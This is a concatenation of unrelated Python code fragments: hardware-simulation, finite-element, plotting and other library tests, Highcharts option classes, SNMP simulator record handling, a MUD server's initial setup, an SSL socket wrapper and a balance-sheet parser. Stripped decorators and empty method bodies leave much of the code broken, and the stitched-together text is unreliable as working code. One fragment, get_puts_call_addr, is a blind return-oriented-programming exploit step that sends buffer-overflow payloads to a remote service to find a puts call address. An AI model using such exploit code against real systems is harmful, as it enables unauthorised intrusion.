(yield)
self.assertEqual((yield dut.chooser.cmd.ba), 0)
(yield)
self.assertEqual((yield dut.chooser.cmd.ba), 0)
(yield from invalidate(0))
self.assertEqual((yield dut.chooser.cmd.ba), 1)
(yield from invalidate(1))
self.assertEqual((yield dut.chooser.cmd.ba), 2)
(yield from invalidate(2))
self.assertEqual((yield dut.chooser.cmd.ba), 3)
(yield from invalidate(3))
self.assertEqual((yield dut.chooser.cmd.ba), 0)
dut = CommandChooserDUT(n_requests=4, bankbits=3, addressbits=13)
run_simulation(dut, main_generator(dut))
def test_selects_next_when_cmd_ready(self):
def main_generator(dut):
(yield dut.chooser.want_cmds.eq(1))
(yield from dut.set_requests('pppp'))
(yield)
def cmd_ready():
(yield dut.chooser.cmd.ready.eq(1))
(yield)
(yield dut.chooser.cmd.ready.eq(0))
(yield)
self.assertEqual((yield dut.chooser.cmd.ba), 0)
(yield)
self.assertEqual((yield dut.chooser.cmd.ba), 0)
(yield from cmd_ready())
self.assertEqual((yield dut.chooser.cmd.ba), 1)
(yield from cmd_ready())
self.assertEqual((yield dut.chooser.cmd.ba), 2)
(yield from cmd_ready())
self.assertEqual((yield dut.chooser.cmd.ba), 3)
(yield from cmd_ready())
self.assertEqual((yield dut.chooser.cmd.ba), 0)
dut = CommandChooserDUT(n_requests=4, bankbits=3, addressbits=13)
run_simulation(dut, main_generator(dut))
def selection_test(self, requests, expected_order, wants):
def main_generator(dut):
for want in wants:
(yield getattr(dut.chooser, want).eq(1))
(yield from dut.set_requests(requests))
(yield)
for (i, expected_index) in enumerate(expected_order):
error_msg = f'requests={requests}, expected_order={expected_order}, i={i}'
if (expected_index == '_'):
cas = (yield dut.chooser.cmd.cas)
ras = (yield dut.chooser.cmd.ras)
we = (yield dut.chooser.cmd.we)
self.assertEqual((cas, ras, we), (0, 0, 0), msg=error_msg)
else:
selected_request_index = (yield dut.chooser.cmd.ba)
self.assertEqual(selected_request_index, int(expected_index), msg=error_msg)
(yield dut.chooser.cmd.ready.eq(1))
(yield)
(yield dut.chooser.cmd.ready.eq(0))
(yield)
assert (len(requests) == 8)
dut = CommandChooserDUT(n_requests=8, bankbits=3, addressbits=13)
run_simulation(dut, main_generator(dut))
('Issue #174')
def test_selects_nothing(self):
requests = 'w_rawpwr'
order = '____'
self.selection_test(requests, order, wants=[])
def test_selects_writes(self):
requests = 'w_rawpwr'
order = '0460460'
self.selection_test(requests, order, wants=['want_writes'])
def test_selects_reads(self):
requests = 'rp_awrrw'
order = '0560560'
self.selection_test(requests, order, wants=['want_reads'])
('Issue #174')
def test_selects_writes_and_reads(self):
requests = 'rp_awrrw'
order = ''
self.selection_test(requests, order, wants=['want_reads', 'want_writes'])
('Issue #174')
def test_selects_cmds_without_act(self):
requests = 'pr_aa_pw'
order = '06060'
self.selection_test(requests, order, wants=['want_cmds'])
def test_selects_cmds_with_act(self):
requests = 'pr_aa_pw'
order = ''
self.selection_test(requests, order, wants=['want_cmds', 'want_activates'])
('Issue #174')
def test_selects_nothing_when_want_activates_only(self):
requests = 'pr_aa_pw'
order = '____'
self.selection_test(requests, order, wants=['want_activates'])
def test_selects_cmds_and_writes(self):
requests = 'pr_aa_pw'
order = '0670670'
self.selection_test(requests, order, wants=['want_cmds', 'want_writes']) |
class Task(WithLogger):
def __init__(self, **kwargs: Any) -> None:
super().__init__(**kwargs)
self._is_executed = False
self._result = None
self.config = kwargs
def __call__(self, *args: Any, **kwargs: Any) -> Any:
if self._is_executed:
raise ValueError('Task already executed.')
self.setup()
try:
self._result = self.execute(*args, **kwargs)
except Exception as e:
self.logger.debug("Got exception of type {} with message '{}' while executing task.".format(type(e), str(e)))
finally:
self._is_executed = True
self.teardown()
return self._result
def is_executed(self) -> bool:
return self._is_executed
def result(self) -> Any:
if (not self._is_executed):
raise ValueError('Task not executed yet.')
return self._result
def setup(self) -> None:
def execute(self, *args: Any, **kwargs: Any) -> Any:
def teardown(self) -> None: |
def test_prolong_low_order_to_restricted(tp_mesh, tp_family, variant):
from firedrake.preconditioners.pmg import prolongation_matrix_matfree
degree = 5
cell = tp_mesh.ufl_cell()
element = FiniteElement(tp_family, cell=cell, degree=degree, variant=variant)
Vi = FunctionSpace(tp_mesh, RestrictedElement(element, restriction_domain='interior'))
Vf = FunctionSpace(tp_mesh, RestrictedElement(element, restriction_domain='facet'))
Vc = FunctionSpace(tp_mesh, tp_family, degree=1)
ui = Function(Vi)
uf = Function(Vf)
uc = Function(Vc)
uc.dat.data[0::2] = 0.0
uc.dat.data[1::2] = 1.0
for v in [ui, uf]:
P = prolongation_matrix_matfree(uc, v).getPythonContext()
P._prolong()
assert (norm(((ui + uf) - uc), 'L2') < 2e-14) |
def test_migrate_gen_kw(setup_case, set_ert_config):
setup_case('block_storage/version-1/poly_example', 'poly.ert')
with open_storage('storage', 'w') as storage:
assert (len(list(storage.experiments)) == 1)
experiment = list(storage.experiments)[0]
param_info = json.loads((experiment._path / 'parameter.json').read_text(encoding='utf-8'))
assert ('COEFFS' in param_info) |
class SizePrefsTestCase(unittest.TestCase):
def assert_tuple(self, t1, t2):
self.assertEqual(t1[0], t2[0])
self.assertEqual(t1[1], t2[1])
def test_sequential_non_resizable(self):
prefs = SizePrefs(4, 'h')
components = [StaticPlotComponent([100, 100]) for i in range(4)]
for (i, c) in enumerate(components):
prefs.update_from_component(c, i)
pref_size = prefs.get_preferred_size()
self.assert_tuple(pref_size, (100, 100, 100, 100))
sizes = prefs.compute_size_array(400)
self.assert_tuple(sizes, (100, 100, 100, 100))
sizes2 = prefs.compute_size_array(500)
self.assert_tuple(sizes, (100, 100, 100, 100))
def test_overlapping_non_resizable(self):
prefs = SizePrefs(1, 'h')
prefs.update_from_component(StaticPlotComponent([100, 10]), 0)
prefs.update_from_component(StaticPlotComponent([200, 10]), 0)
prefs.update_from_component(StaticPlotComponent([300, 10]), 0)
pref_size = prefs.get_preferred_size()
self.assertEqual(pref_size[0], 300)
sizes = prefs.compute_size_array(400)
self.assertEqual(sizes[0], 400)
def test_sequential_resizable(self):
prefs = SizePrefs(3, 'v')
prefs.update_from_component(ResizablePlotComponent([10, 100]), 0)
prefs.update_from_component(ResizablePlotComponent([10, 200]), 1)
prefs.update_from_component(ResizablePlotComponent([10, 300]), 2)
pref_size = prefs.get_preferred_size()
self.assert_tuple(pref_size, (100, 200, 300))
sizes = prefs.compute_size_array(600)
self.assert_tuple(sizes, [100, 200, 300])
sizes2 = prefs.compute_size_array(60)
self.assert_tuple(sizes2, [10, 20, 30])
sizes3 = prefs.compute_size_array(6000)
self.assert_tuple(sizes3, [1000, 2000, 3000])
def test_overlapping_resizable(self):
prefs = SizePrefs(2, 'h')
prefs.update_from_component(ResizablePlotComponent([50, 10]), 0)
prefs.update_from_component(ResizablePlotComponent([100, 10]), 0)
prefs.update_from_component(ResizablePlotComponent([80, 10]), 1)
pref_size = prefs.get_preferred_size()
self.assert_tuple(pref_size, (100, 80))
sizes = prefs.compute_size_array(180)
self.assert_tuple(sizes, (100, 80))
sizes2 = prefs.compute_size_array(360)
self.assert_tuple(sizes2, (200, 160))
def test_sequential_fully_resizable(self):
prefs = SizePrefs(3, 'h')
for i in range(3):
prefs.update_from_component(ResizablePlotComponent(), i)
pref_size = prefs.get_preferred_size()
self.assert_tuple(pref_size, (0, 0, 0))
sizes = prefs.compute_size_array(60)
self.assert_tuple(sizes, (20, 20, 20))
def test_overlapping_fully_resizable(self):
prefs = SizePrefs(1, 'h')
for i in range(3):
prefs.update_from_component(ResizablePlotComponent(), 0)
pref_size = prefs.get_preferred_size()
self.assertEqual(pref_size[0], 0)
sizes = prefs.compute_size_array(60)
self.assertEqual(sizes[0], 60)
def test_sequential_mixed_resizable(self):
prefs = SizePrefs(3, 'h')
prefs.update_from_component(ResizablePlotComponent(), 0)
prefs.update_from_component(ResizablePlotComponent([100, 10]), 1)
prefs.update_from_component(ResizablePlotComponent(), 2)
pref_size = prefs.get_preferred_size()
self.assert_tuple(pref_size, (0, 100, 0))
sizes = prefs.compute_size_array(50)
self.assert_tuple(sizes, (0, 50, 0))
sizes2 = prefs.compute_size_array(100)
self.assert_tuple(sizes2, (0, 100, 0))
sizes3 = prefs.compute_size_array(200)
self.assert_tuple(sizes3, (50, 100, 50))
def test_overlapping_mixed_resizable(self):
prefs = SizePrefs(4, 'h')
prefs.update_from_component(ResizablePlotComponent([100, 10]), 0)
prefs.update_from_component(ResizablePlotComponent(), 0)
prefs.update_from_component(ResizablePlotComponent(), 1)
prefs.update_from_component(ResizablePlotComponent([50, 10]), 1)
prefs.update_from_component(ResizablePlotComponent(), 2)
prefs.update_from_component(ResizablePlotComponent([40, 10]), 2)
prefs.update_from_component(ResizablePlotComponent(), 3)
prefs.update_from_component(ResizablePlotComponent(), 3)
pref_size = prefs.get_preferred_size()
self.assert_tuple(pref_size, (100, 50, 40, 0))
sizes = prefs.compute_size_array(95)
self.assert_tuple(sizes, (50, 25, 20, 0))
sizes2 = prefs.compute_size_array(230)
self.assert_tuple(sizes2, (100, 50, 40, 40))
def test_sequential_mixed_resizable_static(self):
prefs = SizePrefs(3, 'h')
prefs.update_from_component(StaticPlotComponent([100, 10]), 0)
prefs.update_from_component(ResizablePlotComponent([50, 10]), 1)
prefs.update_from_component(ResizablePlotComponent([75, 10]), 2)
pref_size = prefs.get_preferred_size()
self.assert_tuple(pref_size, (100, 50, 75))
sizes = prefs.compute_size_array(225)
self.assert_tuple(sizes, (100, 50, 75))
sizes2 = prefs.compute_size_array(350)
self.assert_tuple(sizes2, (100, 100, 150))
def test_sequential_mixed_resizable_static2(self):
prefs = SizePrefs(4, 'h')
prefs.update_from_component(StaticPlotComponent([100, 10]), 0)
prefs.update_from_component(ResizablePlotComponent([50, 10]), 1)
prefs.update_from_component(ResizablePlotComponent([75, 10]), 2)
prefs.update_from_component(ResizablePlotComponent(), 3)
pref_size = prefs.get_preferred_size()
self.assert_tuple(pref_size, (100, 50, 75, 0))
sizes = prefs.compute_size_array(300)
self.assert_tuple(sizes, (100, 50, 75, 75))
def test_overlapping_mixed_resizable_static(self):
prefs = SizePrefs(5, 'h')
prefs.update_from_component(StaticPlotComponent([100, 10]), 0)
prefs.update_from_component(ResizablePlotComponent([50, 10]), 0)
prefs.update_from_component(StaticPlotComponent([30, 10]), 1)
prefs.update_from_component(ResizablePlotComponent([60, 10]), 1)
prefs.update_from_component(StaticPlotComponent([50, 10]), 2)
prefs.update_from_component(ResizablePlotComponent(), 2)
prefs.update_from_component(ResizablePlotComponent([90, 10]), 3)
prefs.update_from_component(ResizablePlotComponent(), 3)
prefs.update_from_component(ResizablePlotComponent(), 4)
pref_size = prefs.get_preferred_size()
self.assert_tuple(pref_size, (100, 60, 50, 90, 0))
sizes = prefs.compute_size_array((180 + 60))
self.assert_tuple(sizes, (100, (30 + 15), 50, 45, 0))
sizes2 = prefs.compute_size_array((300 + 35))
self.assert_tuple(sizes2, (100, 60, 50, 90, 35)) |
class OptionPlotoptionsBellcurveSonificationDefaultinstrumentoptionsMappingNoteduration(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class SnmprecRecordMixIn(object):
def evaluate_value(self, oid, tag, value, **context):
if (':' in tag):
(mod_name, tag) = (tag[(tag.index(':') + 1):], tag[:tag.index(':')])
else:
mod_name = None
if mod_name:
if (('variationModules' in context) and (mod_name in context['variationModules'])):
if ('dataValidation' in context):
return (oid, tag, univ.Null)
else:
if context['setFlag']:
hexvalue = self.grammar.hexify_value(context['origValue'])
if (hexvalue is not None):
context['hexvalue'] = hexvalue
context['hextag'] = self.grammar.get_tag_by_type(context['origValue'])
context['hextag'] += 'x'
(variation_module, agent_contexts, record_contexts) = context['variationModules'][mod_name]
if (context['dataFile'] not in agent_contexts):
agent_contexts[context['dataFile']] = {}
if (context['dataFile'] not in record_contexts):
record_contexts[context['dataFile']] = {}
variation_module['agentContext'] = agent_contexts[context['dataFile']]
record_contexts = record_contexts[context['dataFile']]
if (oid not in record_contexts):
record_contexts[oid] = {}
variation_module['recordContext'] = record_contexts[oid]
handler = variation_module['variate']
(oid, tag, value) = handler(oid, tag, value, **context)
ReportingManager.update_metrics(variation=mod_name, variation_call_count=1, **context)
else:
ReportingManager.update_metrics(variation=mod_name, variation_failure_count=1, **context)
raise SnmpsimError(('Variation module "%s" referenced but not loaded\r\n' % mod_name))
if (not mod_name):
if ('dataValidation' in context):
snmprec.SnmprecRecord.evaluate_value(self, oid, tag, value, **context)
if (((not context['nextFlag']) and (not context['exactMatch'])) or context['setFlag']):
return (context['origOid'], tag, context['errorStatus'])
if (not hasattr(value, 'tagSet')):
return snmprec.SnmprecRecord.evaluate_value(self, oid, tag, value, **context)
return (oid, tag, value)
def evaluate(self, line, **context):
(oid, tag, value) = self.grammar.parse(line)
oid = self.evaluate_oid(oid)
if context.get('oidOnly'):
value = None
else:
try:
(oid, tag, value) = self.evaluate_value(oid, tag, value, **context)
except NoDataNotification:
raise
except MibOperationError:
raise
except PyAsn1Error as exc:
raise SnmpsimError(('value evaluation for %s = %r failed: %s\r\n' % (oid, value, exc)))
return (oid, value)
def format_value(self, oid, value, **context):
(text_oid, text_tag, text_value) = snmprec.SnmprecRecord.format_value(self, oid, value)
if context['variationModule']:
(plain_oid, plain_tag, plain_value) = snmprec.SnmprecRecord.format_value(self, oid, value, nohex=True)
if (plain_tag != text_tag):
(context['hextag'], context['hexvalue']) = (text_tag, text_value)
else:
(text_tag, text_value) = (plain_tag, plain_value)
handler = context['variationModule']['record']
(text_oid, text_tag, text_value) = handler(text_oid, text_tag, text_value, **context)
elif (('stopFlag' in context) and context['stopFlag']):
raise NoDataNotification()
return (text_oid, text_tag, text_value) |
def unregisterStatsCallback(callback):
with _stats_lock:
try:
_stats_callbacks.remove(callback)
except ValueError:
_logger.error('Callback {!r} is not registered'.format(callback))
return False
else:
_logger.debug('Unregistered stats-callback {!r}'.format(callback))
return True |
class OptionPlotoptionsVariablepieSonificationContexttracksPointgrouping(Options):
def algorithm(self):
return self._config_get('minmax')
def algorithm(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def groupTimespan(self):
return self._config_get(15)
def groupTimespan(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get('y')
def prop(self, text: str):
self._config(text, js_type=False) |
def create_objects():
logger.log_info('Initial setup: Creating objects (Account #1 and Limbo room) ...')
superuser = _get_superuser_account()
from evennia.objects.models import ObjectDB
account_typeclass = settings.BASE_ACCOUNT_TYPECLASS
superuser.swap_typeclass(account_typeclass, clean_attributes=True)
superuser.basetype_setup()
superuser.at_account_creation()
superuser.locks.add('examine:perm(Developer);edit:false();delete:false();boot:false();msg:all()')
superuser.permissions.add('Developer')
try:
superuser_character = ObjectDB.objects.get(id=1)
except ObjectDB.DoesNotExist:
(superuser_character, errors) = superuser.create_character(key=superuser.username, nohome=True, description=_('This is User #1.'))
if errors:
raise Exception(str(errors))
superuser_character.locks.add('examine:perm(Developer);edit:false();delete:false();boot:false();msg:all();puppet:false()')
superuser_character.permissions.add('Developer')
superuser_character.save()
superuser.attributes.add('_first_login', True)
superuser.attributes.add('_last_puppet', superuser_character)
room_typeclass = settings.BASE_ROOM_TYPECLASS
try:
limbo_obj = ObjectDB.objects.get(id=2)
except ObjectDB.DoesNotExist:
limbo_obj = create.create_object(room_typeclass, _('Limbo'), nohome=True)
limbo_obj.db_typeclass_path = room_typeclass
limbo_obj.db.desc = LIMBO_DESC.strip()
limbo_obj.save()
if (not superuser_character.location):
superuser_character.location = limbo_obj
if (not superuser_character.home):
superuser_character.home = limbo_obj |
class GreenConnection(greenio.GreenSocket):
def __init__(self, ctx, sock=None):
if (sock is not None):
fd = orig_SSL.Connection(ctx, sock)
else:
fd = ctx
super(ConnectionType, self).__init__(fd)
def do_handshake(self):
if self.act_non_blocking:
return self.fd.do_handshake()
while True:
try:
return self.fd.do_handshake()
except WantReadError:
trampoline(self.fd.fileno(), read=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
except WantWriteError:
trampoline(self.fd.fileno(), write=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
def dup(self):
raise NotImplementedError('Dup not supported on SSL sockets')
def makefile(self, mode='r', bufsize=(- 1)):
raise NotImplementedError('Makefile not supported on SSL sockets')
def read(self, size):
'Works like a blocking call to SSL_read(), whose behavior is\n described here:
if self.act_non_blocking:
return self.fd.read(size)
while True:
try:
return self.fd.read(size)
except WantReadError:
trampoline(self.fd.fileno(), read=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
except WantWriteError:
trampoline(self.fd.fileno(), write=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
except SysCallError as e:
if ((get_errno(e) == (- 1)) or (get_errno(e) > 0)):
return ''
recv = read
def write(self, data):
'Works like a blocking call to SSL_write(), whose behavior is\n described here:
if (not data):
return 0
if self.act_non_blocking:
return self.fd.write(data)
while True:
try:
return self.fd.write(data)
except WantReadError:
trampoline(self.fd.fileno(), read=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
except WantWriteError:
trampoline(self.fd.fileno(), write=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
send = write
def sendall(self, data):
tail = self.send(data)
while (tail < len(data)):
tail += self.send(data[tail:])
def shutdown(self):
if self.act_non_blocking:
return self.fd.shutdown()
while True:
try:
return self.fd.shutdown()
except WantReadError:
trampoline(self.fd.fileno(), read=True, timeout=self.gettimeout(), timeout_exc=socket.timeout)
except WantWriteError:
trampoline(self.fd.fileno(), write=True, timeout=self.gettimeout(), timeout_exc=socket.timeout) |
def get_puts_call_addr():
addr = stop_addr
while True:
addr += 1
payload = ('A' * buf_size)
payload += p64((gadgets_addr + 9))
payload += p64(4194304)
payload += p64(addr)
payload += p64(stop_addr)
try:
io = get_io()
io.sendline(payload)
if io.recv().startswith('\x7fELF'):
log.info(('puts call address: 0x%x' % addr))
io.close()
return addr
log.info(('bad: 0x%x' % addr))
io.close()
except EOFError as e:
io.close()
log.info(('bad: 0x%x' % addr))
except:
log.info("Can't connect")
addr -= 1 |
(scope='module')
def module1_unique():
class Module1():
a = 'a'
def __init__(self, w3):
self._b = 'b'
self.w3 = w3
def b(self):
return self._b
def return_eth_chain_id(self):
return self.w3.eth.chain_id
return Module1 |
def get_balance_sheet_items(security_item, start_date=None, report_period=None, report_event_date=None, return_type='json'):
security_item = to_security_item(security_item)
path = get_balance_sheet_path(security_item)
_download_finance_data_if_need(path, security_item['code'])
encoding = 'GB2312'
with open(path, encoding=encoding) as fr:
lines = fr.readlines()
reportDate = lines[0].split()[1:(- 1)]
moneyFunds = lines[3].split()[1:(- 1)]
heldForTradingFinancialAssets = lines[4].split()[1:(- 1)]
derivative = lines[5].split()[1:(- 1)]
billsReceivable = lines[6].split()[1:(- 1)]
accountsReceivable = lines[7].split()[1:(- 1)]
prepaidAccounts = lines[8].split()[1:(- 1)]
interestReceivable = lines[9].split()[1:(- 1)]
dividendReceivable = lines[10].split()[1:(- 1)]
otherReceivables = lines[11].split()[1:(- 1)]
buyingBackTheSaleOfFinancialAssets = lines[12].split()[1:(- 1)]
inventory = lines[13].split()[1:(- 1)]
assetsForSale = lines[14].split()[1:(- 1)]
nonCurrentAssetsDueWithinOneYear = lines[15].split()[1:(- 1)]
unamortizedExpenditures = lines[16].split()[1:(- 1)]
waitDealIntangibleAssetsLossOrIncome = lines[17].split()[1:(- 1)]
otherCurrentAssets = lines[18].split()[1:(- 1)]
totalCurrentAssets = lines[19].split()[1:(- 1)]
loansAndPaymentsOnBehalf = lines[21].split()[1:(- 1)]
availableForSaleFinancialAssets = lines[22].split()[1:(- 1)]
heldToMaturityInvestment = lines[23].split()[1:(- 1)]
longTermReceivables = lines[24].split()[1:(- 1)]
longTermEquityInvestment = lines[25].split()[1:(- 1)]
investmentRealEstate = lines[26].split()[1:(- 1)]
NetfixedAssets = lines[27].split()[1:(- 1)]
constructionInProcess = lines[28].split()[1:(- 1)]
engineerMaterial = lines[29].split()[1:(- 1)]
fixedAssetsInLiquidation = lines[30].split()[1:(- 1)]
productiveBiologicalAssets = lines[31].split()[1:(- 1)]
nonProfitLivingAssets = lines[32].split()[1:(- 1)]
oilAndGasAssets = lines[33].split()[1:(- 1)]
intangibleAssets = lines[34].split()[1:(- 1)]
developmentExpenditure = lines[35].split()[1:(- 1)]
goodwill = lines[36].split()[1:(- 1)]
longTermDeferredExpenses = lines[37].split()[1:(- 1)]
deferredIncomeTaxAssets = lines[38].split()[1:(- 1)]
OtherNonCurrentAssets = lines[39].split()[1:(- 1)]
nonCurrentAssets = lines[40].split()[1:(- 1)]
totalAssets = lines[41].split()[1:(- 1)]
shortTermBorrowing = lines[43].split()[1:(- 1)]
transactionFinancialLiabilities = lines[44].split()[1:(- 1)]
billsPayable = lines[45].split()[1:(- 1)]
accountsPayable = lines[46].split()[1:(- 1)]
accountsReceivedInAdvance = lines[47].split()[1:(- 1)]
handlingChargesAndCommissionsPayable = lines[48].split()[1:(- 1)]
employeeBenefitsPayable = lines[49].split()[1:(- 1)]
taxesAndSurchargesPayable = lines[50].split()[1:(- 1)]
interestPayable = lines[51].split()[1:(- 1)]
dividendpayable = lines[52].split()[1:(- 1)]
otherPayables = lines[53].split()[1:(- 1)]
withholdingExpenses = lines[54].split()[1:(- 1)]
deferredIncomeWithinOneYear = lines[55].split()[1:(- 1)]
shortTermDebenturesPayable = lines[56].split()[1:(- 1)]
nonCurrentLiabilitiesMaturingWithinOneYear = lines[57].split()[1:(- 1)]
otherCurrentLiability = lines[58].split()[1:(- 1)]
totalCurrentLiabilities = lines[59].split()[1:(- 1)]
LongTermBorrowing = lines[61].split()[1:(- 1)]
bondPayable = lines[62].split()[1:(- 1)]
longTermPayables = lines[63].split()[1:(- 1)]
longTermEmployeeBenefitsPayable = lines[64].split()[1:(- 1)]
specialPayable = lines[65].split()[1:(- 1)]
expectedNonCurrentLiabilities = lines[66].split()[1:(- 1)]
deferredIncomeTaxLiabilities = lines[67].split()[1:(- 1)]
longTermDeferredRevenue = lines[68].split()[1:(- 1)]
otherNonCurrentLiabilities = lines[69].split()[1:(- 1)]
totalNonCurrentLiabilities = lines[70].split()[1:(- 1)]
totalLiabilities = lines[71].split()[1:(- 1)]
totalShareCapital = lines[73].split()[1:(- 1)]
capitalSurplus = lines[74].split()[1:(- 1)]
treasuryStock = lines[75].split()[1:(- 1)]
otherComprehensiveIncome = lines[76].split()[1:(- 1)]
theSpecialReserve = lines[77].split()[1:(- 1)]
surplusReserves = lines[78].split()[1:(- 1)]
generalRiskPreparation = lines[79].split()[1:(- 1)]
undistributedProfits = lines[80].split()[1:(- 1)]
bookValue = lines[81].split()[1:(- 1)]
minorityBookValue = lines[82].split()[1:(- 1)]
totalBookValue = lines[83].split()[1:(- 1)]
totalLiabilitiesAndOwnersEquity = lines[84].split()[1:(- 1)]
result_list = []
for (idx, _) in enumerate(reportDate):
if start_date:
if (pd.Timestamp(reportDate[idx]) < pd.Timestamp(start_date)):
continue
reportEventDate = get_report_event_date(security_item, report_period=reportDate[idx])
if (report_period and (not is_same_date(report_period, reportDate[idx]))):
continue
if (report_event_date and (pd.Timestamp(report_event_date) < pd.Timestamp(reportEventDate))):
continue
the_json = {'id': '{}_{}'.format(security_item['id'], reportDate[idx]), 'reportPeriod': to_time_str(reportDate[idx]), 'timestamp': to_time_str(reportEventDate), 'reportEventDate': to_time_str(reportEventDate), 'securityId': security_item['id'], 'code': security_item['code'], 'moneyFunds': to_float(moneyFunds[idx]), 'heldForTradingFinancialAssets': to_float(heldForTradingFinancialAssets[idx]), 'derivative': to_float(derivative[idx]), 'billsReceivable': to_float(billsReceivable[idx]), 'accountsReceivable': to_float(accountsReceivable[idx]), 'prepaidAccounts': to_float(prepaidAccounts[idx]), 'interestReceivable': to_float(interestReceivable[idx]), 'dividendReceivable': to_float(dividendReceivable[idx]), 'otherReceivables': to_float(otherReceivables[idx]), 'buyingBackTheSaleOfFinancialAssets': to_float(buyingBackTheSaleOfFinancialAssets[idx]), 'inventory': to_float(inventory[idx]), 'assetsForSale': to_float(assetsForSale[idx]), 'nonCurrentAssetsDueWithinOneYear': to_float(nonCurrentAssetsDueWithinOneYear[idx]), 'unamortizedExpenditures': to_float(unamortizedExpenditures[idx]), 'waitDealIntangibleAssetsLossOrIncome': to_float(waitDealIntangibleAssetsLossOrIncome[idx]), 'otherCurrentAssets': to_float(otherCurrentAssets[idx]), 'totalCurrentAssets': to_float(totalCurrentAssets[idx]), 'loansAndPaymentsOnBehalf': to_float(loansAndPaymentsOnBehalf[idx]), 'availableForSaleFinancialAssets': to_float(availableForSaleFinancialAssets[idx]), 'heldToMaturityInvestment': to_float(heldToMaturityInvestment[idx]), 'longTermReceivables': to_float(longTermReceivables[idx]), 'longTermEquityInvestment': to_float(longTermEquityInvestment[idx]), 'investmentRealEstate': to_float(investmentRealEstate[idx]), 'NetfixedAssets': to_float(NetfixedAssets[idx]), 'constructionInProcess': to_float(constructionInProcess[idx]), 'engineerMaterial': to_float(engineerMaterial[idx]), 'fixedAssetsInLiquidation': to_float(fixedAssetsInLiquidation[idx]), 'productiveBiologicalAssets': to_float(productiveBiologicalAssets[idx]), 'nonProfitLivingAssets': to_float(nonProfitLivingAssets[idx]), 'oilAndGasAssets': to_float(oilAndGasAssets[idx]), 'intangibleAssets': to_float(intangibleAssets[idx]), 'developmentExpenditure': to_float(developmentExpenditure[idx]), 'goodwill': to_float(goodwill[idx]), 'longTermDeferredExpenses': to_float(longTermDeferredExpenses[idx]), 'deferredIncomeTaxAssets': to_float(deferredIncomeTaxAssets[idx]), 'OtherNonCurrentAssets': to_float(OtherNonCurrentAssets[idx]), 'nonCurrentAssets': to_float(nonCurrentAssets[idx]), 'totalAssets': to_float(totalAssets[idx]), 'shortTermBorrowing': to_float(shortTermBorrowing[idx]), 'transactionFinancialLiabilities': to_float(transactionFinancialLiabilities[idx]), 'billsPayable': to_float(billsPayable[idx]), 'accountsPayable': to_float(accountsPayable[idx]), 'accountsReceivedInAdvance': to_float(accountsReceivedInAdvance[idx]), 'handlingChargesAndCommissionsPayable': to_float(handlingChargesAndCommissionsPayable[idx]), 'employeeBenefitsPayable': to_float(employeeBenefitsPayable[idx]), 'taxesAndSurchargesPayable': to_float(taxesAndSurchargesPayable[idx]), 'interestPayable': to_float(interestPayable[idx]), 'dividendpayable': to_float(dividendpayable[idx]), 'otherPayables': to_float(otherPayables[idx]), 'withholdingExpenses': to_float(withholdingExpenses[idx]), 'deferredIncomeWithinOneYear': to_float(deferredIncomeWithinOneYear[idx]), 'shortTermDebenturesPayable': to_float(shortTermDebenturesPayable[idx]), 'nonCurrentLiabilitiesMaturingWithinOneYear': to_float(nonCurrentLiabilitiesMaturingWithinOneYear[idx]), 'otherCurrentLiability': to_float(otherCurrentLiability[idx]), 'totalCurrentLiabilities': to_float(totalCurrentLiabilities[idx]), 'LongTermBorrowing': to_float(LongTermBorrowing[idx]), 'bondPayable': to_float(bondPayable[idx]), 'longTermPayables': to_float(longTermPayables[idx]), 'longTermEmployeeBenefitsPayable': to_float(longTermEmployeeBenefitsPayable[idx]), 'specialPayable': to_float(specialPayable[idx]), 'expectedNonCurrentLiabilities': to_float(expectedNonCurrentLiabilities[idx]), 'deferredIncomeTaxLiabilities': to_float(deferredIncomeTaxLiabilities[idx]), 'longTermDeferredRevenue': to_float(longTermDeferredRevenue[idx]), 'otherNonCurrentLiabilities': to_float(otherNonCurrentLiabilities[idx]), 'totalNonCurrentLiabilities': to_float(totalNonCurrentLiabilities[idx]), 'totalLiabilities': to_float(totalLiabilities[idx]), 'totalShareCapital': to_float(totalShareCapital[idx]), 'capitalSurplus': to_float(capitalSurplus[idx]), 'treasuryStock': to_float(treasuryStock[idx]), 'otherComprehensiveIncome': to_float(otherComprehensiveIncome[idx]), 'theSpecialReserve': to_float(theSpecialReserve[idx]), 'surplusReserves': to_float(surplusReserves[idx]), 'generalRiskPreparation': to_float(generalRiskPreparation[idx]), 'undistributedProfits': to_float(undistributedProfits[idx]), 'bookValue': to_float(bookValue[idx]), 'minorityBookValue': to_float(minorityBookValue[idx]), 'totalBookValue': to_float(totalBookValue[idx]), 'totalLiabilitiesAndOwnersEquity': to_float(totalLiabilitiesAndOwnersEquity[idx])}
the_data = the_json
if (return_type == 'doc'):
the_data = BalanceSheet(meta={'id': the_json['id']})
fill_doc_type(the_data, the_json)
if (report_period and is_same_date(report_period, reportDate[idx])):
return the_data
result_list.append(the_data)
if result_list:
result_list = sorted(result_list, key=(lambda x: pd.Timestamp(x['reportPeriod'])))
return result_list |
def dtest():
herder = VpsHerder(debug=True)
clientname = 'test-2'
(provider, kwargs) = herder.generate_do_conf()
herder.log.info('Creating instance...')
herder.log.info("\tClient name: '%s'", clientname)
herder.log.info("\tusing provider: '%s'", provider)
herder.log.info("\tkwargs: '%s'", kwargs)
ret = herder.cc.create(names=[clientname], provider=provider, **kwargs)
print('Create response:', ret)
herder.configure_client(clientname, 0, provider=provider, provider_kwargs=kwargs)
herder.log.info('Instance created!') |
def go():
flags.IS_FLASK = True
settings.MAX_DB_SESSIONS = 10
import sys
if (not ('debug' in sys.argv)):
print('Starting background thread')
if ('debug' in sys.argv):
print('Running in debug mode.')
app.run(host='0.0.0.0', port=5001, debug=True)
else:
print('Running in normal mode.')
import cherrypy
import logging
def fixup_cherrypy_logs():
